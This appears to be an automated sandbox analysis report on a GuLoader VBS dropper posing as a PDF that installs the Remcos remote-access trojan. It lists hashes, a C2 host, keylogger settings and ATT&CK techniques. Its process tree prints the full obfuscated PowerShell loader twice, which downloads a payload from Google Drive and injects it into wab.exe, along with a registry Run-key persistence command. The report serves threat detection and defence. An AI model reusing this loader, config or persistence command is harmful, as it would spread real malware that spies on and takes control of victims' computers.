guloader | eb1183f6f4fa252c4f3b66ae4424bc7785eaf3089ba89dafc86e5a8393ff6c01

General

Target

SIGN_O0305538279·pdf.vbs
Size

674KB
MD5

ee18a12f0c79b4ac228025b83ec43938
SHA1

f29ad3e06b23e7aacca219fd747fde72f9d5162a
SHA256

22a2cfbda9c7a790c6d1c3771c5a93cabc30abacb83670c73f3844fc49b23416
SHA512

cbeecf8447415a4050f9e79304287d8eab0000f7a2a4afee5b4c350ef76dae228d4fcf7dc2ba0563ba2723a8596c6b08c11bca77b95dde0b14270ab0bb0baea6
SSDEEP

12288:3c/6T75JYBpvoalqV9PjpfgtQY+yveJ0Psg/:3c65uBpD0bPjpfZMeyz

Score

10^/10

guloader remcos remotehost downloader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
true
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KQ00DZ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1712 WScript.exe
7 1532 powershell.exe
9 1532 powershell.exe

flow	pid	process
3	1712	WScript.exe
7	1532	powershell.exe
9	1532	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\sultan = "%ranid% -w 1 $cykelparkeringernes=(Get-ItemProperty -Path 'HKCU:\\Underfrankerende\\').Braggite;%ranid% ($cykelparkeringernes)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
11 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2600 wab.exe
2600 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1868 powershell.exe
2600 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1868 set thread context of 2600 1868 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2688 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

1532 powershell.exe
1868 powershell.exe
1868 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1868 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1532 powershell.exe
Token: SeDebugPrivilege 1868 powershell.exe

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

pid	process
2600	wab.exe
2600	wab.exe

pid	process
1868	powershell.exe
2600	wab.exe

description	pid	process	target process
PID 1868 set thread context of 2600	1868	powershell.exe	wab.exe

pid	process
2688	reg.exe

pid	process
1532	powershell.exe
1868	powershell.exe
1868	powershell.exe

pid	process
1868	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1712 wrote to memory of 1532	1712	WScript.exe	powershell.exe
PID 1712 wrote to memory of 1532	1712	WScript.exe	powershell.exe
PID 1712 wrote to memory of 1532	1712	WScript.exe	powershell.exe
PID 1532 wrote to memory of 2728	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 2728	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 2728	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 1868	1532	powershell.exe	powershell.exe
PID 1532 wrote to memory of 1868	1532	powershell.exe	powershell.exe
PID 1532 wrote to memory of 1868	1532	powershell.exe	powershell.exe
PID 1532 wrote to memory of 1868	1532	powershell.exe	powershell.exe
PID 1868 wrote to memory of 2040	1868	powershell.exe	cmd.exe
PID 1868 wrote to memory of 2040	1868	powershell.exe	cmd.exe
PID 1868 wrote to memory of 2040	1868	powershell.exe	cmd.exe
PID 1868 wrote to memory of 2040	1868	powershell.exe	cmd.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 1868 wrote to memory of 2600	1868	powershell.exe	wab.exe
PID 2600 wrote to memory of 2740	2600	wab.exe	cmd.exe
PID 2600 wrote to memory of 2740	2600	wab.exe	cmd.exe
PID 2600 wrote to memory of 2740	2600	wab.exe	cmd.exe
PID 2600 wrote to memory of 2740	2600	wab.exe	cmd.exe
PID 2740 wrote to memory of 2688	2740	cmd.exe	reg.exe
PID 2740 wrote to memory of 2688	2740	cmd.exe	reg.exe
PID 2740 wrote to memory of 2688	2740	cmd.exe	reg.exe
PID 2740 wrote to memory of 2688	2740	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_O0305538279·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bimlet = 1;$Goldcup='Substrin';$Goldcup+='g';Function Afsondrede($Bernhardine){$Classicalises=$Bernhardine.Length-$Bimlet;For($Fratagendes=7; $Fratagendes -lt $Classicalises; $Fratagendes+=(8)){$Bashawism+=$Bernhardine.$Goldcup.Invoke($Fratagendes, $Bimlet);}$Bashawism;}function Possisdendi($Retare){. ($Impuls) ($Retare);}$Uddrevnes=Afsondrede 'BelbsraMVerdensoefterbrzTooart,iS ntisel ankerflOvers,ra J rhea/Infects5Vicevrt.Implosi0Califor Mas.ina(Feu,erlWOpruln,iAuktionnDiabolud,uperino SavagiwOve hums Massey SupermN Boxca TTrakto. Slentr1Boome.a0Flipper. rianf0Art.ste; Merrie Inds,ndW TransfiFersknenLa ding6Deling,4Chordac;Kulstof GwaineaxEroder,6In,eres4Entrail;U,grate Shah,ntrKvartaavTalbert:Frgerie1praecor2 Brevia1.cturie.Isthmia0P.ychon)Flagsmy GlaukeG TyvekreUlgeligc MinistkFoinstioStraffe/ho,ridi2husking0De,ifus1Ukammer0Bothway0 oprerb1Priskri0 udvikl1Kantone Store,FHomogeniFritidsr Ver,ereScar crfSuperinoOpgivelxTengu,y/Bonasus1Udledni2Naam,as1Kystv n.Hv.lros0Beramme ';$Eftertragtelserne=Afsondrede 'Svags rU BrandssBays,elePseudobrAsk.wge- cantalASka.edegExtermieOverflynPropriet Whirlp ';$Touring=Afsondrede ',temmeghGarvesttUndefautaarvaagpParabolsBothieb:handleb/ Crunod/Virkso dHebr.isr BoblekiLogensivHyposcleTrifoi..FundulugRichardoPa.odisoLoeile g rayerslPutoffseTiaraen. Hyrevoc Coniluore undam Nonsus/Tvilli.uArbejdscProsyfo?malaki,e KommisxHalv rdp Anvendo HusvrtrFjernent Firebl=UnpublidJoggledoKranierwFrightenKontraklNewsiesoMeloneraVividesdJaninam&Svanehai SknsandSilva,m=M.taeol1eivorstZFraktio3YderzonhF,equenTLanignaDPortugiFGallant1Un.locuGsnerperjBilinduEindvarsPTranspiYDiakonib TomiagJ PrsterqrespokeACloudle_registr7 Tronaf5WidishrGLejli.hO Woops,aSaponar- PaaklaxLandskigSnksm.dMGuerdonM TrochaV.rchedvtUdfrdi 1 InvokaabackbenK esignf ';$Regnskabskonsulents=Afsondrede 'Debarke>Jamb.re ';$Impuls=Afsondrede 'Affugteis.uatteeMau,elixIndesta ';$Termotj = Afsondrede ' Unp treCaseharcAncestrhhoben,voBlubber Uheldsv%Tyra.noaHousewapSvmmetup MacrurdUnconfiaAshramutSlemmesaBrspapi%.ntersu\UdraderSReformap.rkningobygge.tkRe,erveeInt midsErythriwSupersqo Lu,tvamTocobaga AwhirrnCauseresImpac,bhD,abetiiLrredskpabusefu.SleepinRVitrageh angasieSymmetr Underud&Laxness&Skarnsk SubchoreNonbearc EigildhTorsdago Ext,os Glovere$ U,unst ';Possisdendi (Afsondrede ' Accele$Fl.mmesg sh ndrl,kikkeloNazaratb Palaeoa GendrilGlyce,o:candlewTBeskrivrPejlkomiKonomimmCrys.alaImbricacBereg ieWhortler Flad u= Gerat.(windwarcUtopiermIntercadHametzo Da ebo/.atientcanodine Flnge.o$RedeligTBentstaeBagkropr Akersdm CarnaloTransfetAsymptoj ,reatu)Tittetb ');Possisdendi (Afsondrede ' G ndol$Cessatig Smreg lTthe aaoovenwoobBogstavaSacr,sclConnect:Perlus,VSocialgeParametrSnetykne C actinPr vinsaKoll.do=U,viske$religioT NytnknoTradimeuPiculchr Bepatci Fldeskn,olorergConf.ic.U.derpas Char.epQua.ritlTvangsfiBefrie tBumleto(Nedkrad$Circ msR.ightiee Garn igpensakrn Altisos kemotakAccessiaEpitha,b b ucinsPlatitukVegetgcoSterlinn TomgansKredittusk,evoglDrgningeTre idenFramkeyt Stfrons mgikke)Erotoph ');$Touring=$Verena[0];Possisdendi (Afsondrede 'Sero,og$ Dekonsg SkaftslOverhaioFal tosbAfskaffaAfskummlDocum.n:DyslektA Opprespskovb ap RastafrPsy,hoaoModejouvThespisaReputatlP,usgrasOvergan=SpejlkaNDev.tioeKuttensw Calend- Show,fOBrewe.bbMiskredjTorskenePerisarcAferesstDis,res NewshenSSpraysbyJaegarss AabenbtThorougeG aistnmNarkose.StikkedNChiromaeBankkuntOmforde. PredamWla dskieIntravab HjlpsiCJournallVic.rshiSkruenge RevieonChumpr,tKubisti ');Possisdendi (Afsondrede 'Nord.ta$FlypastAParoemipHonni,gpO amiccrglalivioMacushlvOrdinaraRengrinlPanderisIncon.u.Finge,eHNoneleceBedui,ea snrestdAffectieglaspusrStereotsindu ed[Ve.tlig$ Pr.henEUcaleftfEftergitIsoch.oeAnarchirBrands,t VondsirHereditalight,egCalpackt ChokoleAgt,rpal.cleroks Altonse BengalrTakk,vanIndervge Galago]A minis= Perten$ NazareUUnsiccadBruttoidOverwhir.otgunbeBorgerlvBet.ksonLeechlieG,dreplsTjenest ');$Halvguder=Afsondrede '.hockerA Peria,pAkti ejpOpb udsrKedelpaoBallelsvS agfjeaPedestrlNatur os clerid.SwarajeDNor,noroSnold swUdl,gninAnl dnil Stempeo.epatoraByudvikdHemocytFDrainagiJasm nblDolabeleLindied( Roa.sh$uroksesTGriberloTrihydruDasnt er Luffdii Fra.dgnToothi.gSherifa, Redeli$F.esabbB Toothcrmonoamiy Luf lan UndergjKautio e PanicanDokhavnsDopeh.r)Bistria ';$Halvguder=$Trimacer[1]+$Halvguder;$Brynjens=$Trimacer[0];Possisdendi (Afsondrede 'Tidsnok$ Flyverg Antl.rlUnperfooFraraadbHarshlea DehypnlC,stask:,ideoteP.gnehislFaktoraa Tutte,nSikkerhiLuftsprnUndiffie spilletknitrereFi.kedrrPressin= Malfor( UnamalTSubstane Decarbs EfterbtVetiver-Galliu,P PopulaaJamremit TabuerhSerumag Nymphal$DrepaniB Ster.irStyringyFgtni gn Gal,anjPlaskeneAffilianSubcrucsEelin n)Flerbru ');while (!$Planineter) {Possisdendi (Afsondrede 'photogr$ Unco,vgStraalelCarbureoPhot.scbAfdelina OversklFaareho: MonodooAscaridv BombabeFanebrerStephanmLedens e Grundte ispensk.rtekrm=Japacon$Brnde,rt Nomadersc uroiuSkolevseRe andg ') ;Possisdendi $Halvguder;Possisdendi (Afsondrede ' ReliefSBesvimetInviiblaSparrinrUnder otP.ostit-.aggrypSDedolomlV.riabieIdeograeHorsemepPalinur Arbejds4Frantic ');Possisdendi (Afsondrede ' skank $trykke.g traditlWheezinoUnfanatbYerksgtaCranberlPlumul,:BlanksvPJenvr.elVrdif la Aktio,nUdle,eriSpildvanFinansmeProskritSamliv,e Fre frrU.tille= He.ero(TrancenTEvakue eUdviklis vegravtBeachie-SkummenP Sail datangloptIx.didrhove hig Tonlst$Re,piraBmarkedsrFon,teky emonstnT stamejModelbieErythemnStolesdsTri,itr)Selffu. ') ;Possisdendi (Afsondrede 'S upple$FemkantgU.fundel vampevo BundesbNationaaY.ansstlAnskuet:Grader RCh,orotu Retur,tMicrocoaSyndikabtids tea Herr,fgSonantiaPrawnedsMonadol=tavshed$PacchavgStylebolNipsgeno .ilskdbHyp rseaErgotrolFstning: gul vrb efraine,lavysapGetup fiClarinolMrkerddlBesaettaBrndingrturkey,eLynafledRaadgiv+Su.erim+Optrrin% Boligr$Skr,entV HeaveneApoplexrUragrupelystryknUncompea redi.e.WherehecmisinfooHolbae.uUnlobednMungoostSa rist ') ;$Touring=$Verena[$Rutabagas];}Possisdendi (Afsondrede 'Sipidit$ Vrdi,rgBeholdel ,uskedoGonid.cb FluoraaPhotaeslPedalia:AgresvuZNonprino For.vin LejnineSengetrigussblonU alcohd SmreoldEsotropeSpardk lInbreakiJinketcnCo,munigSurfinge .aganin.rtrykksUp ries La srd=Kaet er GlyphoGBerkeleeTatbebstAfdrama-An ttelCSkraabjo.elefonnElmetr tSocialpeSkind unTvang,stcowfl.p Mesal.k$Sme tenB S.adder Need eyInboundn S mplijI entice dsfjennVenvills stendy ');Possisdendi (Afsondrede 'Verific$ForanstgDriblinlMelchitoindiumabApatetiaInkvisilCrepido:CooperaH .mpaira Furan yBjffedewNephreca TraadvgAuxiliaoskalmurnNeotrag efters=Ringesc Capripe[AuktionS DialysyShetlndsForswort Suba.gemand.opm Alfabe.RadbrkkCSnot umoBroodernEp.ncepvOverar,eA,cederrVirksomtAmtsraa]sh,offr:Konfere:Racef.rF PseudarRenholdoMandamumFodboldBgaad,rnaKlammers SteffaeU.dimen6Doveco 4MolasseSInsuffit Anlgsur Ani.boi Gladsan ConvalgHowg,te( Regr s$PhonateZ tyrefooDownshinAb.omineGrundsyiPteros.n Tvetuld RedigednedkastecyklotrlAandrigiStandsfn ophistgAneroideUkiyoesnTem,hulsSorro l)Altoget ');Possisdendi (Afsondrede ' fhngig$ Beslaag MentallRespo so Siks.kb Hypo,yasupercolDiploce: DetaljLTroldesiCiderensT aledstDacryopei,geniorEntreate samle lPaadraglkangrisoIndkrinsV,ldgifeBakterisAf adsk1Borge k7Revestu Afvikli= Inter Underex[ReaccosS,isarchySymb,lesStitchet.eriangeTilsikrmHave,fe.BegirtaTNonascrephotogrx S ortitbiomath. TrochiESpisehunTenrecacStigesdo Raadgid Al.ainiNoner dn AllerggBk.enbu]Spekula:Dispar,:.niversAS,stemtSDrikkevCVerfendI oitynoITaxamet.ParatraG s ndaceCo parttTankefuS Theopht Artillr Nept ni Formu.nEumoirig denime(Fri.age$IndtgtsHAnnulleaDo lessyRadmag.wSoldansa SuppligHypoalioLggedemnUremiaf)Mcc llu ');Possisdendi (Afsondrede 'Thorulf$moyitetghorizonl KejseroDepravebSvale oaGameteslTraumat: RestekVhesteh.adamp ogk casimilFljdrene arsledr adonna=Op.avsr$ FiligrL Sko,briU liftesGrundlotAaringeeJe.strmr Osc lleFakkeltlIrreprelUnc nsto An imosSptmejseVer.inls C.obda1Midmorn7M llemt.MartressAlveoleuYo.denmbNoncomps FunktitCienegar TuskliiSanerennautarkigAppa.ac(Follett3unarray3Goodwil9Gymnas.6A,pulle8lnstign7Del.bar,Flovtd,2Metaple8Dingd,n8 Differ0Ord est7Eurotil)foxfire ');Possisdendi $Vakler;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spokeswomanship.Rhe && echo $"
3⤵
PID:2728

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bimlet = 1;$Goldcup='Substrin';$Goldcup+='g';Function Afsondrede($Bernhardine){$Classicalises=$Bernhardine.Length-$Bimlet;For($Fratagendes=7; $Fratagendes -lt $Classicalises; $Fratagendes+=(8)){$Bashawism+=$Bernhardine.$Goldcup.Invoke($Fratagendes, $Bimlet);}$Bashawism;}function Possisdendi($Retare){. ($Impuls) ($Retare);}$Uddrevnes=Afsondrede 'BelbsraMVerdensoefterbrzTooart,iS ntisel ankerflOvers,ra J rhea/Infects5Vicevrt.Implosi0Califor Mas.ina(Feu,erlWOpruln,iAuktionnDiabolud,uperino SavagiwOve hums Massey SupermN Boxca TTrakto. Slentr1Boome.a0Flipper. rianf0Art.ste; Merrie Inds,ndW TransfiFersknenLa ding6Deling,4Chordac;Kulstof GwaineaxEroder,6In,eres4Entrail;U,grate Shah,ntrKvartaavTalbert:Frgerie1praecor2 Brevia1.cturie.Isthmia0P.ychon)Flagsmy GlaukeG TyvekreUlgeligc MinistkFoinstioStraffe/ho,ridi2husking0De,ifus1Ukammer0Bothway0 oprerb1Priskri0 udvikl1Kantone Store,FHomogeniFritidsr Ver,ereScar crfSuperinoOpgivelxTengu,y/Bonasus1Udledni2Naam,as1Kystv n.Hv.lros0Beramme ';$Eftertragtelserne=Afsondrede 'Svags rU BrandssBays,elePseudobrAsk.wge- cantalASka.edegExtermieOverflynPropriet Whirlp ';$Touring=Afsondrede ',temmeghGarvesttUndefautaarvaagpParabolsBothieb:handleb/ Crunod/Virkso dHebr.isr BoblekiLogensivHyposcleTrifoi..FundulugRichardoPa.odisoLoeile g rayerslPutoffseTiaraen. Hyrevoc Coniluore undam Nonsus/Tvilli.uArbejdscProsyfo?malaki,e KommisxHalv rdp Anvendo HusvrtrFjernent Firebl=UnpublidJoggledoKranierwFrightenKontraklNewsiesoMeloneraVividesdJaninam&Svanehai SknsandSilva,m=M.taeol1eivorstZFraktio3YderzonhF,equenTLanignaDPortugiFGallant1Un.locuGsnerperjBilinduEindvarsPTranspiYDiakonib TomiagJ PrsterqrespokeACloudle_registr7 Tronaf5WidishrGLejli.hO Woops,aSaponar- PaaklaxLandskigSnksm.dMGuerdonM TrochaV.rchedvtUdfrdi 1 InvokaabackbenK esignf ';$Regnskabskonsulents=Afsondrede 'Debarke>Jamb.re ';$Impuls=Afsondrede 'Affugteis.uatteeMau,elixIndesta ';$Termotj = Afsondrede ' Unp treCaseharcAncestrhhoben,voBlubber Uheldsv%Tyra.noaHousewapSvmmetup MacrurdUnconfiaAshramutSlemmesaBrspapi%.ntersu\UdraderSReformap.rkningobygge.tkRe,erveeInt midsErythriwSupersqo Lu,tvamTocobaga AwhirrnCauseresImpac,bhD,abetiiLrredskpabusefu.SleepinRVitrageh angasieSymmetr Underud&Laxness&Skarnsk SubchoreNonbearc EigildhTorsdago Ext,os Glovere$ U,unst ';Possisdendi (Afsondrede ' Accele$Fl.mmesg sh ndrl,kikkeloNazaratb Palaeoa GendrilGlyce,o:candlewTBeskrivrPejlkomiKonomimmCrys.alaImbricacBereg ieWhortler Flad u= Gerat.(windwarcUtopiermIntercadHametzo Da ebo/.atientcanodine Flnge.o$RedeligTBentstaeBagkropr Akersdm CarnaloTransfetAsymptoj ,reatu)Tittetb ');Possisdendi (Afsondrede ' G ndol$Cessatig Smreg lTthe aaoovenwoobBogstavaSacr,sclConnect:Perlus,VSocialgeParametrSnetykne C actinPr vinsaKoll.do=U,viske$religioT NytnknoTradimeuPiculchr Bepatci Fldeskn,olorergConf.ic.U.derpas Char.epQua.ritlTvangsfiBefrie tBumleto(Nedkrad$Circ msR.ightiee Garn igpensakrn Altisos kemotakAccessiaEpitha,b b ucinsPlatitukVegetgcoSterlinn TomgansKredittusk,evoglDrgningeTre idenFramkeyt Stfrons mgikke)Erotoph ');$Touring=$Verena[0];Possisdendi (Afsondrede 'Sero,og$ Dekonsg SkaftslOverhaioFal tosbAfskaffaAfskummlDocum.n:DyslektA Opprespskovb ap RastafrPsy,hoaoModejouvThespisaReputatlP,usgrasOvergan=SpejlkaNDev.tioeKuttensw Calend- Show,fOBrewe.bbMiskredjTorskenePerisarcAferesstDis,res NewshenSSpraysbyJaegarss AabenbtThorougeG aistnmNarkose.StikkedNChiromaeBankkuntOmforde. PredamWla dskieIntravab HjlpsiCJournallVic.rshiSkruenge RevieonChumpr,tKubisti ');Possisdendi (Afsondrede 'Nord.ta$FlypastAParoemipHonni,gpO amiccrglalivioMacushlvOrdinaraRengrinlPanderisIncon.u.Finge,eHNoneleceBedui,ea snrestdAffectieglaspusrStereotsindu ed[Ve.tlig$ Pr.henEUcaleftfEftergitIsoch.oeAnarchirBrands,t VondsirHereditalight,egCalpackt ChokoleAgt,rpal.cleroks Altonse BengalrTakk,vanIndervge Galago]A minis= Perten$ NazareUUnsiccadBruttoidOverwhir.otgunbeBorgerlvBet.ksonLeechlieG,dreplsTjenest ');$Halvguder=Afsondrede '.hockerA Peria,pAkti ejpOpb udsrKedelpaoBallelsvS agfjeaPedestrlNatur os clerid.SwarajeDNor,noroSnold swUdl,gninAnl dnil Stempeo.epatoraByudvikdHemocytFDrainagiJasm nblDolabeleLindied( Roa.sh$uroksesTGriberloTrihydruDasnt er Luffdii Fra.dgnToothi.gSherifa, Redeli$F.esabbB Toothcrmonoamiy Luf lan UndergjKautio e PanicanDokhavnsDopeh.r)Bistria ';$Halvguder=$Trimacer[1]+$Halvguder;$Brynjens=$Trimacer[0];Possisdendi (Afsondrede 'Tidsnok$ Flyverg Antl.rlUnperfooFraraadbHarshlea DehypnlC,stask:,ideoteP.gnehislFaktoraa Tutte,nSikkerhiLuftsprnUndiffie spilletknitrereFi.kedrrPressin= Malfor( UnamalTSubstane Decarbs EfterbtVetiver-Galliu,P PopulaaJamremit TabuerhSerumag Nymphal$DrepaniB Ster.irStyringyFgtni gn Gal,anjPlaskeneAffilianSubcrucsEelin n)Flerbru ');while (!$Planineter) {Possisdendi (Afsondrede 'photogr$ Unco,vgStraalelCarbureoPhot.scbAfdelina OversklFaareho: MonodooAscaridv BombabeFanebrerStephanmLedens e Grundte ispensk.rtekrm=Japacon$Brnde,rt Nomadersc uroiuSkolevseRe andg ') ;Possisdendi $Halvguder;Possisdendi (Afsondrede ' ReliefSBesvimetInviiblaSparrinrUnder otP.ostit-.aggrypSDedolomlV.riabieIdeograeHorsemepPalinur Arbejds4Frantic ');Possisdendi (Afsondrede ' skank $trykke.g traditlWheezinoUnfanatbYerksgtaCranberlPlumul,:BlanksvPJenvr.elVrdif la Aktio,nUdle,eriSpildvanFinansmeProskritSamliv,e Fre frrU.tille= He.ero(TrancenTEvakue eUdviklis vegravtBeachie-SkummenP Sail datangloptIx.didrhove hig Tonlst$Re,piraBmarkedsrFon,teky emonstnT stamejModelbieErythemnStolesdsTri,itr)Selffu. ') ;Possisdendi (Afsondrede 'S upple$FemkantgU.fundel vampevo BundesbNationaaY.ansstlAnskuet:Grader RCh,orotu Retur,tMicrocoaSyndikabtids tea Herr,fgSonantiaPrawnedsMonadol=tavshed$PacchavgStylebolNipsgeno .ilskdbHyp rseaErgotrolFstning: gul vrb efraine,lavysapGetup fiClarinolMrkerddlBesaettaBrndingrturkey,eLynafledRaadgiv+Su.erim+Optrrin% Boligr$Skr,entV HeaveneApoplexrUragrupelystryknUncompea redi.e.WherehecmisinfooHolbae.uUnlobednMungoostSa rist ') ;$Touring=$Verena[$Rutabagas];}Possisdendi (Afsondrede 'Sipidit$ Vrdi,rgBeholdel ,uskedoGonid.cb FluoraaPhotaeslPedalia:AgresvuZNonprino For.vin LejnineSengetrigussblonU alcohd SmreoldEsotropeSpardk lInbreakiJinketcnCo,munigSurfinge .aganin.rtrykksUp ries La srd=Kaet er GlyphoGBerkeleeTatbebstAfdrama-An ttelCSkraabjo.elefonnElmetr tSocialpeSkind unTvang,stcowfl.p Mesal.k$Sme tenB S.adder Need eyInboundn S mplijI entice dsfjennVenvills stendy ');Possisdendi (Afsondrede 'Verific$ForanstgDriblinlMelchitoindiumabApatetiaInkvisilCrepido:CooperaH .mpaira Furan yBjffedewNephreca TraadvgAuxiliaoskalmurnNeotrag efters=Ringesc Capripe[AuktionS DialysyShetlndsForswort Suba.gemand.opm Alfabe.RadbrkkCSnot umoBroodernEp.ncepvOverar,eA,cederrVirksomtAmtsraa]sh,offr:Konfere:Racef.rF PseudarRenholdoMandamumFodboldBgaad,rnaKlammers SteffaeU.dimen6Doveco 4MolasseSInsuffit Anlgsur Ani.boi Gladsan ConvalgHowg,te( Regr s$PhonateZ tyrefooDownshinAb.omineGrundsyiPteros.n Tvetuld RedigednedkastecyklotrlAandrigiStandsfn ophistgAneroideUkiyoesnTem,hulsSorro l)Altoget ');Possisdendi (Afsondrede ' fhngig$ Beslaag MentallRespo so Siks.kb Hypo,yasupercolDiploce: DetaljLTroldesiCiderensT aledstDacryopei,geniorEntreate samle lPaadraglkangrisoIndkrinsV,ldgifeBakterisAf adsk1Borge k7Revestu Afvikli= Inter Underex[ReaccosS,isarchySymb,lesStitchet.eriangeTilsikrmHave,fe.BegirtaTNonascrephotogrx S ortitbiomath. TrochiESpisehunTenrecacStigesdo Raadgid Al.ainiNoner dn AllerggBk.enbu]Spekula:Dispar,:.niversAS,stemtSDrikkevCVerfendI oitynoITaxamet.ParatraG s ndaceCo parttTankefuS Theopht Artillr Nept ni Formu.nEumoirig denime(Fri.age$IndtgtsHAnnulleaDo lessyRadmag.wSoldansa SuppligHypoalioLggedemnUremiaf)Mcc llu ');Possisdendi (Afsondrede 'Thorulf$moyitetghorizonl KejseroDepravebSvale oaGameteslTraumat: RestekVhesteh.adamp ogk casimilFljdrene arsledr adonna=Op.avsr$ FiligrL Sko,briU liftesGrundlotAaringeeJe.strmr Osc lleFakkeltlIrreprelUnc nsto An imosSptmejseVer.inls C.obda1Midmorn7M llemt.MartressAlveoleuYo.denmbNoncomps FunktitCienegar TuskliiSanerennautarkigAppa.ac(Follett3unarray3Goodwil9Gymnas.6A,pulle8lnstign7Del.bar,Flovtd,2Metaple8Dingd,n8 Differ0Ord est7Eurotil)foxfire ');Possisdendi $Vakler;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spokeswomanship.Rhe && echo $"
4⤵
PID:2040

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "sultan" /t REG_EXPAND_SZ /d "%ranid% -w 1 $cykelparkeringernes=(Get-ItemProperty -Path 'HKCU:\Underfrankerende\').Braggite;%ranid% ($cykelparkeringernes)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "sultan" /t REG_EXPAND_SZ /d "%ranid% -w 1 $cykelparkeringernes=(Get-ItemProperty -Path 'HKCU:\Underfrankerende\').Braggite;%ranid% ($cykelparkeringernes)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2688

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b2f2f5028a881ebeeae322cb96d269b3

SHA1
54ed36784f5084af4a7dee377520a07da1a4c045

SHA256
